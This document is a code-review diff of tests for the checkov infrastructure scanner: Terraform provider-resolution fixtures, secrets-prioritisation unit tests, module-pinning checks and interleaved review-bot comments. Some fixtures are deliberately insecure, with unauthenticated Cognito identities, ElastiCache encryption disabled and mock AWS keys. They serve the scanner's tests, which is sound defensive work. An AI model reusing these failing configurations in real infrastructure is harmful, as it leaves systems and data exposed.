summary = sca_image_report.get_summary() 
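Review bot: `from .conftest import DOCKERFILE_EXAMPLES_DIR, KUBERNETES_EXAMPLES_DIR` in the import hunk of test_runner.py imports conftest.py as an ordinary module, which pytest discourages: conftest files are loaded by the plugin machinery and, depending on the import mode, importing one from a test module can load it a second time under another module name and register its fixtures twice. Keep the two directory constants in a plain module (for example the `.mocks` module that is already imported, or a small `paths.py` beside it) and import them from there in both conftest.py and this file. With the three `WORKFLOW_*`/`DOCKERFILE_*` assignments removed, `Path` from pathlib may no longer be referenced in this module; that import line is outside the hunk, so check it before merging.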
@@ -236,7 +234,7 @@ def test_run_license_policy(mock_bc_integration, image_name, cached_scan_result) # when runner_filter = RunnerFilter(checks=['BC_LIC_1'], run_image_referencer=True) - reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR), runner_filter=runner_filter) + reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter) sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) # then assert not [c for c in sca_image_report.passed_checks + sca_image_report.failed_checks @@ -292,8 +290,8 @@ def test_run_with_empty_scan_result(mock_bc_integration): @mock.patch.dict(os.environ, {"CKV_IGNORE_HIDDEN_DIRECTORIES": "false"}) @mock.patch('checkov.sca_image.runner.Runner.get_image_cached_results', mock_scan_image) -def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cached_scan_result2): - image_id_encoded = quote_plus(f"image:{image_name2}") +def test_run_with_image_cached_reports_env(mock_bc_integration, image_name, cached_scan_result2): + image_id_encoded = quote_plus(f"image:{image_name}") with aioresponses() as mock_response: mock_response.get( @@ -303,7 +301,7 @@ def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cac ) runner_filter = RunnerFilter(run_image_referencer=True) - reports = GHA_Runner().run(root_folder=str(WORKFLOW_IMAGE_EXAMPLES_DIR), runner_filter=runner_filter) + reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter) sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) assert len(sca_image_report.passed_checks) == 0 
@@ -316,9 +314,9 @@ def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cac @mock.patch.dict(os.environ, {"CHECKOV_CREATE_SCA_IMAGE_REPORTS_FOR_IR": "False"}) @mock.patch.dict(os.environ, {"CKV_IGNORE_HIDDEN_DIRECTORIES": "false"}) @mock.patch('checkov.sca_image.runner.Runner.get_image_cached_results', mock_scan_image) -def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integration, image_name2, +def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integration, image_name, cached_scan_result2): - image_id_encoded = quote_plus(f"image:{image_name2}") + image_id_encoded = quote_plus(f"image:{image_name}") with aioresponses() as mock_response: mock_response.get( url=URL(mock_bc_integration.api_url + f"/api/v1/vulnerabilities/scan-results/{image_id_encoded}", encoded=True), @@ -327,7 +325,7 @@ def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integ ) runner_filter = RunnerFilter(run_image_referencer=True) - reports = GHA_Runner().run(root_folder=str(WORKFLOW_IMAGE_EXAMPLES_DIR), runner_filter=runner_filter) + reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter) sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) assert len(sca_image_report.passed_checks) == 0 diff --git a/tests/secrets/test_prioritise_secrets.py b/tests/secrets/test_prioritise_secrets.py new file mode 100644 index 00000000000..d0994c48347 --- /dev/null +++ b/tests/secrets/test_prioritise_secrets.py 
@@ -0,0 +1,54 @@
+import unittest
+
+from checkov.common.models.enums import CheckResult
+from checkov.common.output.secrets_record import SecretsRecord
+from checkov.secrets.runner import Runner, ENTROPY_CHECK_IDS, GENERIC_PRIVATE_KEY_CHECK_IDS
+
+
+class TestPrioritiseSecrets(unittest.TestCase):
+ def setUp(self):
+ self.secret_records = {
+ 'key1': SecretsRecord(check_id='CKV_SECRET_6', check_name='foo',
+ check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')],
+ file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None,
+ check_class='CheckClass', file_abs_path='abs_path'),
+ 'key2': SecretsRecord(check_id='CKV_SECRET_10', check_name='foo',
+ check_result={"result": CheckResult.FAILED},
+ code_block=[(1, 'baz')], file_path='qux', file_line_range=[1, 2], resource='resource',
+ evaluations=None, check_class='CheckClass', file_abs_path='abs_path'),
+ 'key3': SecretsRecord(check_id='CKV_SECRET_18', check_name='foo',
+ check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')],
+ file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None,
+ check_class='CheckClass', file_abs_path='abs_path'),
+ }
+ self.ENTROPY_CHECK_IDS = ENTROPY_CHECK_IDS
+ self.GENERIC_PRIVATE_KEY_CHECK_IDS = GENERIC_PRIVATE_KEY_CHECK_IDS
+
+ def test_entropy_check_id_removed(self):
+ result = Runner._prioritise_secrets(self.secret_records, 'key1', 'CKV_SECRET_18')
+ self.assertTrue(result)
+ self.assertNotIn('key1', self.secret_records)
+
+ def test_generic_private_key_check_id_removed(self):
+ result = Runner._prioritise_secrets(self.secret_records, 'key2', 'CKV_SECRET_18')
+ self.assertTrue(result)
+ self.assertNotIn('key2', self.secret_records)
+
+ def test_no_removal_entropy_check_id(self):
+ result = Runner._prioritise_secrets(self.secret_records, 'key1', 'CKV_SECRET_6')
+ self.assertFalse(result)
+ self.assertIn('key1', self.secret_records)
+
+ def test_no_removal_generic_private_key_check_id(self):
+ result = Runner._prioritise_secrets(self.secret_records, 'key2', 'CKV_SECRET_10')
+ self.assertFalse(result)
+ self.assertIn('key2', self.secret_records)
+
+ def test_no_removal_other_check_id(self):
+ result = Runner._prioritise_secrets(self.secret_records, 'key3', 'CKV_SECRET_1000')
+ self.assertFalse(result)
+ self.assertIn('key3', self.secret_records)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf b/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf
index 0fb5edc174d..c8e43ad69cf 100644
--- a/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf
+++ b/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf
@@ -6,7 +6,7 @@ provider "aws" {
 region = "us-west-2"
 }
-# The resources in the Provider block are not explicitly associated to this reosource.
+# The resources in the Provider block are not explicitly associated to this resource.
 module "example" {
 source = "./example"
 providers = {
diff --git a/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf b/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf
new file mode 100644
index 00000000000..3eade85d3c6
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf
@@ -0,0 +1,3 @@
+resource "aws_s3_bucket" "bucket"{
+ bucket = "module-bucket"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf b/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf
new file mode 100644
index 00000000000..ddf9c45c4e8
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf
@@ -0,0 +1,8 @@
+provider "aws" {
+ region = "us-west-1"
+}
+
+# The resources in the Provider block are not explicitly associated to this resource.
+module "example" {
+ source = "./example"
+}
\ No newline at end of file
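Review bot: `setUp` in test_prioritise_secrets.py assigns `self.ENTROPY_CHECK_IDS` and `self.GENERIC_PRIVATE_KEY_CHECK_IDS` but no test reads them, and the tests instead hard-code `'CKV_SECRET_6'` and `'CKV_SECRET_10'` as stand-ins for the entropy and generic-private-key families without checking that they belong to those sets, so a later change to either set would silently change what the tests exercise. The three `SecretsRecord(...)` literals differ only in `check_id`, which hides that fact behind twelve lines of identical keyword arguments. A small factory plus two membership assertions makes the premise explicit and keeps the dead attributes out; the five `test_*` methods are unchanged.
```python
    @staticmethod
    def _record(check_id):
        # Minimal SecretsRecord; the tests in this class only vary check_id.
        return SecretsRecord(check_id=check_id, check_name='foo',
                             check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')],
                             file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None,
                             check_class='CheckClass', file_abs_path='abs_path')

    def setUp(self):
        # Premise of the tests below: key1 is an entropy finding, key2 a generic private-key finding.
        self.assertIn('CKV_SECRET_6', ENTROPY_CHECK_IDS)
        self.assertIn('CKV_SECRET_10', GENERIC_PRIVATE_KEY_CHECK_IDS)
        self.secret_records = {
            'key1': self._record('CKV_SECRET_6'),
            'key2': self._record('CKV_SECRET_10'),
            'key3': self._record('CKV_SECRET_18'),
        }
    # … unchanged: the five test_* methods …
```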
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf new file mode 100644 index 00000000000..002a92686d3 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf @@ -0,0 +1,24 @@ +provider "aws" { + region = "us-west-1" + skip_credentials_validation = true + skip_requesting_account_id = true + skip_metadata_api_check = true +# s3_force_path_style = true + access_key = "mock_access_key" + secret_key = "mock_secret_key" +} + +module "level1" { + source = "./nesting" + } + + +module "level1_2" { + source = "./nesting_2" + } + + +resource "aws_s3_bucket_object" "this_file_2" { + bucket = "your_bucket_name" + key = "some_key" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf new file mode 100644 index 00000000000..444b2c0b0f3 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf @@ -0,0 +1,41 @@ +provider "aws" { + region = "us-west-1" + skip_credentials_validation = true + skip_requesting_account_id = true + skip_metadata_api_check = true +# s3_force_path_style = true + access_key = "mock_access_key" + secret_key = "mock_secret_key" +} + +provider "aws" { + region = "eu-west-1" + alias = "eu_west" + skip_credentials_validation = true + skip_requesting_account_id = true + skip_metadata_api_check = true +# s3_force_path_style = true + access_key = "mock_access_key" + secret_key = "mock_secret_key" +} + +module "level2" { + source = "./nesting_l2" +} + +module "level2_2" { + source = "./nesting_l2_2" + providers = { + aws = aws.eu_west + } +} + + + + +resource "aws_s3_bucket_object" "this_other_file" { + bucket = "your_bucket_name" + key = "key" + source = "source" + +} 
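Review bot: The commented-out `# s3_force_path_style = true` line is repeated in all three `provider "aws"` blocks of example_provider_edge_case/main.tf and nesting/main.tf; it is dead configuration in a fixture whose purpose, per the accompanying readme, is provider-address resolution, so either delete it or replace it with a comment saying why it is kept. The same applies to the `access_key`/`secret_key` and `skip_*` attributes: if these files are only parsed by checkov and never run by terraform, they add nothing but inline credential-looking strings that secret scanners will flag, and a one-line `# mock credentials, never used: this fixture is only parsed` would make that explicit if they are needed. The `module` blocks close with an indented ` }` while the `provider` and `resource` blocks close at column 0; `terraform fmt` would normalise this, and main.tf is missing its trailing newline.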
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf new file mode 100644 index 00000000000..c9ba64cc40f --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf @@ -0,0 +1,5 @@ + +resource "aws_s3_bucket_object" "this_file_2" { + bucket = "your_bucket_name" + key = "some_key" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf new file mode 100644 index 00000000000..c9ba64cc40f --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf @@ -0,0 +1,5 @@ + +resource "aws_s3_bucket_object" "this_file_2" { + bucket = "your_bucket_name" + key = "some_key" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf new file mode 100644 index 00000000000..c9ba64cc40f --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf @@ -0,0 +1,5 @@ + +resource "aws_s3_bucket_object" "this_file_2" { + bucket = "your_bucket_name" + key = "some_key" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md b/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md new file mode 100644 index 00000000000..c145246bc89 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md 
@@ -0,0 +1,27 @@ +Resources by Address: + +File: /main.tf:21-24 +- aws_s3_bucket_object.this_file_2 + - Expected `__provider_address__` == "aws.default" + - Result: aws.default + +File: /nesting/main.tf:36-41 +- module.level1.aws_s3_bucket_object.this_other_file + - Expected `__provider_address__` == "module.level1.aws.default" + - Result: aws.default + + +File: /nesting/nesting_l2/main.tf:2-5 +- module.level1.module.level2.aws_s3_bucket_object.this_file_2 + - Expected: `__provider_address__` == "module.level1.aws.default" + - Result: __provider_address__ does not exist + +File: /nesting/nesting_l2_2/main.tf:2-5 +- module.level1.module.level2_2.aws_s3_bucket_object.this_file_2 + - Expected: `__provider_address__` == "module.level1.aws.eu_west" + - Result: aws.eu_west + +File: /nesting_2/main.tf:2-5 +- module.level1_2.aws_s3_bucket_object.this_file_2 + - Expected: `__provider_address__` == "aws.default" + - Result: aws.default \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf new file mode 100644 index 00000000000..a701ffbe4f6 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf @@ -0,0 +1,12 @@ +provider "abbey" { +} + +provider "aws" { + region = "" + alias = "aaa" +} + +resource "aws_s3_bucket" "bucket"{ + bucket = "module-bucket" + provider = "aws.aaa" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf new file mode 100644 index 00000000000..d62ddb0b0e1 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf @@ -0,0 +1,3 @@ +module "example2" { + source = "./example2" +} \ No newline at end of file 
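Review bot: `provider = "aws.aaa"` in `aws_s3_bucket.bucket` of `example/example2/main.tf` is the quoted form of a provider reference, while `example_provider_without_module/main.tf` in the same commit uses the bare reference `provider = aws.usw1`; Terraform treats the quoted spelling as legacy syntax, so unless that legacy form is exactly what `test_provider_nested_module` is meant to exercise, the fixture should read `provider = aws.aaa` for consistency. If the quoted spelling is deliberate, a one-line comment such as `# quoted provider reference kept on purpose: legacy syntax the parser must still resolve` would stop the next person from normalising it and silently changing what the test covers.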
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf new file mode 100644 index 00000000000..ddf9c45c4e8 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf @@ -0,0 +1,8 @@ +provider "aws" { + region = "us-west-1" +} + +# The resources in the Provider block are not explicitly associated to this resource. +module "example" { + source = "./example" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf new file mode 100644 index 00000000000..3eade85d3c6 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf @@ -0,0 +1,3 @@ +resource "aws_s3_bucket" "bucket"{ + bucket = "module-bucket" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf new file mode 100644 index 00000000000..d62ddb0b0e1 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf @@ -0,0 +1,3 @@ +module "example2" { + source = "./example2" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf new file mode 100644 index 00000000000..88ee09cea82 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf 
@@ -0,0 +1,16 @@ +provider "aws" { + region = "us-west-1" +} + +provider "aws" { + region = "eu-west-1" + alias = "eu-west-1" +} + +# The resources in the Provider block are not explicitly associated to this resource. +module "example" { + source = "./example" + providers = { + aws = aws.eu-west-1 + } +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_without_module/main.tf b/tests/terraform/checks/data/aws/example_provider_without_module/main.tf new file mode 100644 index 00000000000..e63ccd104d1 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_without_module/main.tf @@ -0,0 +1,17 @@ +provider "aws" { + region = "usw2" +} + +provider "aws" { + alias = "usw1" + region = "" +} + +resource "aws_s3_bucket" "bucket"{ + bucket = "bucket" + provider = aws.usw1 +} + +resource "aws_s3_bucket" "bucket_2" { + bucket = "bucket-2" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/test_ModuleProvider.py b/tests/terraform/checks/data/aws/test_ModuleProvider.py index c134cefd86f..099672ab004 100644 --- a/tests/terraform/checks/data/aws/test_ModuleProvider.py +++ b/tests/terraform/checks/data/aws/test_ModuleProvider.py @@ -6,7 +6,7 @@ class TestModuleProvider(unittest.TestCase): - def test(self): + def test_module_with_two_providers(self): test_files_dir = Path(__file__).parent / "example_ModuleProvider" hcl_config_parser = TFParser() 
@@ -15,8 +15,82 @@ def test(self): local_graph.build_graph(True) assert len(local_graph.edges) == 2 + assert local_graph.vertices[0].attributes.get('__provider_address__') == local_graph.vertices[3].attributes.get('__address__') + assert local_graph.vertices[0].attributes.get('__provider_address__') == local_graph.vertices[3].config['aws'].get('__address__') assert local_graph.edges[0].origin == 1 and local_graph.edges[0].dest == 3 assert local_graph.edges[1].origin == 0 and local_graph.edges[1].dest == 3 + def test_module_with_one_def_provider(self): + test_files_dir = Path(__file__).parent / "example_module_with_one_provider" + + hcl_config_parser = TFParser() + module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM') + local_graph = TerraformLocalGraph(module) + local_graph.build_graph(True) + + resource_provider_address = local_graph.vertices[0].attributes.get('__provider_address__') + default_provider_address_from_module = local_graph.vertices[2].attributes.get('__address__') + + assert resource_provider_address == default_provider_address_from_module + + def test_resource_with_def_provider(self): + test_files_dir = Path(__file__).parent / "example_provider_without_module" + + hcl_config_parser = TFParser() + module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM') + local_graph = TerraformLocalGraph(module) + local_graph.build_graph(True) + + # assert resource with provider ref. 
+ resource_provider_address_with_alias = local_graph.vertices[2].attributes.get('__provider_address__') + provider_address_with_alias = local_graph.vertices[1].attributes.get('__address__') + assert resource_provider_address_with_alias == provider_address_with_alias + + # assert resource without ref to the default provider + resource_provider_address_default = local_graph.vertices[3].attributes.get('__provider_address__') + provider_address_default = local_graph.vertices[0].attributes.get('__address__') + assert resource_provider_address_default == provider_address_default + + def test_provider_nested_module(self): + test_files_dir = Path(__file__).parent / "example_provider_with_nested_module" + + hcl_config_parser = TFParser() + module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM') + local_graph = TerraformLocalGraph(module) + local_graph.build_graph(True) + + # assert resource with provider ref. + resource_provider_address_with_alias = local_graph.vertices[2].attributes.get('__provider_address__') + provider_address_with_alias = local_graph.vertices[1].attributes.get('__address__') + assert resource_provider_address_with_alias == provider_address_with_alias + + def test_example_provider_with_nested_module_assign_provider(self): + test_files_dir = Path(__file__).parent / "example_provider_with_nested_module_assign_provider" + + hcl_config_parser = TFParser() + module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM') + local_graph = TerraformLocalGraph(module) + local_graph.build_graph(True) + + # assert resource with provider ref. 
+ resource_provider_address_with_alias = local_graph.vertices[0].attributes.get('__provider_address__') + provider_address_with_alias = local_graph.vertices[4].attributes.get('__address__') + assert resource_provider_address_with_alias == provider_address_with_alias + + def test_provider_edge_cases(self): + test_files_dir = Path(__file__).parent / "example_provider_edge_case" + + hcl_config_parser = TFParser() + module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM') + local_graph = TerraformLocalGraph(module) + local_graph.build_graph(True) + + assert local_graph.vertices[3].attributes.get('__provider_address__') == "aws.default" + assert local_graph.vertices[8].attributes.get('__provider_address__') == "module.level1.aws.default" + assert local_graph.vertices[9].attributes.get('__provider_address__') == "module.level1.aws.default" + assert local_graph.vertices[10].attributes.get('__provider_address__') == "module.level1.aws.eu_west" + assert local_graph.vertices[11].attributes.get('__provider_address__') == "aws.default" + + if __name__ == "__main__": unittest.main() diff --git a/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf b/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf new file mode 100644 index 00000000000..74862c9a265 --- /dev/null +++ b/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf 
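Review bot: `test_provider_edge_cases` asserts `local_graph.vertices[9].attributes.get('__provider_address__') == "module.level1.aws.default"`, while the fixture's `readme.md` records for `module.level1.module.level2.aws_s3_bucket_object.this_file_2` that `__provider_address__ does not exist`; if vertex 9 is that resource, either the readme is stale or the assertion pins behaviour the implementation does not yet have, and the two should be brought into agreement. Every new test also addresses vertices by position (`vertices[0]`, `vertices[3]`, `vertices[8]` …), which silently breaks as soon as parsing order changes and hides which resource is being checked; a small lookup such as `by_addr = {v.attributes.get('__address__'): v for v in local_graph.vertices}` followed by asserting on `by_addr["module.level1.aws_s3_bucket_object.this_other_file"]` makes the intent readable and the test order-independent. The enclosing `test_module_with_two_providers` starts before this hunk.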
@@ -0,0 +1,106 @@ +# pass + +module "hash" { + source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=26c38a66f12e7c6c93b6a2ba127ad68981a48671" + + name = "my-vpc" + cidr = "10.0.0.0/16" + + azs = ["eu-west-1a", "eu-west-1b", "eu-west-1c"] + private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"] + public_subnets = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"] + + enable_nat_gateway = true + enable_vpn_gateway = true + + tags = { + Terraform = "true" + Environment = "dev" + } +} + +module "sub_dir_hash" { + source = "git::https://github.com/terraform-aws-modules/terraform-aws-cloudwatch.git//modules/log-group?ref=60cf981e0f1ae033699e5b274440867e48289967" + + name = "git" + retention_in_days = 120 +} + +module "tag" { + source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=v5.0.0" + + name = "my-vpc" + cidr = "10.0.0.0/16" + + azs = ["eu-west-1a", "eu-west-1b", "eu-west-1c"] + private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"] + public_subnets = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"] + + enable_nat_gateway = true + enable_vpn_gateway = true + + tags = { + Terraform = "true" + Environment = "dev" + } +} + +module "shallow_clone" { + source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?depth=1&ref=v1.2.0" +} + +module "module_with_version" { + source = "terraform-aws-modules/iam/aws//modules/iam-github-oidc-role" + version = "5.39.1" +} + +# fail + +module "tf_registry_no_version" { + source = "terraform-aws-modules/cloudwatch/aws//modules/log-group" +} + +module "looks_like_a_branch" { + source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=some_branch_name" + + name = "my-vpc" + cidr = "10.0.0.0/16" + + azs = ["eu-west-1a", "eu-west-1b", "eu-west-1c"] + private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"] + public_subnets = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"] + + enable_nat_gateway = true + 
enable_vpn_gateway = true + + tags = { + Terraform = "true" + Environment = "dev" + } +} + +module "github_module" { + source = "github.com/hashicorp/example" +} + +module "bitbucket_module" { + source = "bitbucket.org/hashicorp/terraform-consul-aws" +} + +module "github_ssh_module" { + source = "git@github.com:hashicorp/example.git" +} + +module "generic_git_module" { + source = "git::https://example.com/vpc.git" +} + +# unknown + +module "relative" { + source = "./example" +} + +module "backtrack" { + source = "../example" +} \ No newline at end of file diff --git a/tests/terraform/checks/module/generic/test_RevisionVersionTag.py b/tests/terraform/checks/module/generic/test_RevisionVersionTag.py new file mode 100644 index 00000000000..ec9031f9550 --- /dev/null +++ b/tests/terraform/checks/module/generic/test_RevisionVersionTag.py 
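Review bot: The `# pass` group places `module "tag"` (`?ref=v5.0.0`) and `module "module_with_version"` (`version = "5.39.1"`) beside the commit-hash pins without saying that a git tag or a registry version can be moved or re-published while a hash cannot, so a reader may take the fixture as saying all five are equally strong pins. A heading comment such as `# pass: some revision is pinned (hash, tag or registry version); the check does not judge how immutable the pin is` makes the boundary the check draws explicit. A registry source with a range constraint (e.g. `version = "~> 5.0"`) is covered by neither group, so the expected verdict for non-exact constraints is not recorded; one such module in the fixture would pin it.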
@@ -0,0 +1,50 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.module.generic.RevisionVersionTag import check
+from checkov.terraform.runner import Runner
+
+
+class TestRevisionVersionTag(unittest.TestCase):
+ def test(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_RevisionVersionTag"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "hash",
+ "sub_dir_hash",
+ "tag",
+ "shallow_clone",
+ "module_with_version"
+ }
+
+ failing_resources = {
+ "looks_like_a_branch",
+ "tf_registry_no_version",
+ "generic_git_module",
+ "bitbucket_module",
+ "github_ssh_module",
+ "github_module"
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf b/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf
new file mode 100644
index 00000000000..ab3e808e7ad
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf
@@ -0,0 +1,7 @@
+resource "aws_cognito_identity_pool" "pass" {
+ allow_unauthenticated_identities = false
+}
+
+resource "aws_cognito_identity_pool" "fail" {
+ allow_unauthenticated_identities = true
+}
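Review bot: The fixture's `# unknown` modules (`relative`, `backtrack`) are not asserted anywhere in `test`; the count and set assertions only show they landed in neither `passed_checks` nor `failed_checks`, and nothing records that they were parsed at all. If `report.get_summary()` exposes a total resource count (not visible from this hunk), asserting it would pin that local-path modules are scanned but left without a verdict; otherwise a comment such as `# local-path modules (relative, backtrack) are expected to yield no result` above `passing_resources` documents the intent so a future change that starts failing them is noticed.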
diff --git a/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf b/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf
new file mode 100644
index 00000000000..b5be01b1b90
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf
@@ -0,0 +1,53 @@
+resource "aws_elasticache_replication_group" "pass" {
+ automatic_failover_enabled = true
+ replication_group_id = "tf-rep-group-1"
+ node_type = "cache.m4.large"
+ parameter_group_name = "default.redis3.2"
+ port = 6379
+ at_rest_encryption_enabled = true
+ transit_encryption_enabled = true
+ auth_token = var.auth_token
+}
+
+resource "aws_elasticache_replication_group" "pass2" {
+ replication_group_id = local.replication_group_id
+ description = "Sample Redis replication group"
+ engine = "redis"
+ transit_encryption_enabled = true
+ user_group_ids = [
+ "sample-group-id"
+ ]
+}
+
+resource "aws_elasticache_replication_group" "fail" {
+ automatic_failover_enabled = true
+ replication_group_id = "tf-rep-group-2"
+ node_type = "cache.m4.large"
+ parameter_group_name = "default.redis3.2"
+ port = 6379
+ at_rest_encryption_enabled = false
+ transit_encryption_enabled = false
+}
+
+resource "aws_elasticache_replication_group" "fail2" {
+ automatic_failover_enabled = true
+ replication_group_id = "tf-rep-group-2"
+ node_type = "cache.m4.large"
+ parameter_group_name = "default.redis3.2"
+ port = 6379
+ at_rest_encryption_enabled = false
+ transit_encryption_enabled = false
+ user_group_ids = [
+ "sample-group-id"
+ ]
+}
+
+resource "aws_elasticache_replication_group" "fail3" {
+ automatic_failover_enabled = true
+ replication_group_id = "tf-rep-group-2"
+ node_type = "cache.m4.large"
+ parameter_group_name = "default.redis3.2"
+ port = 6379
+ at_rest_encryption_enabled = false
+ transit_encryption_enabled = true
+}
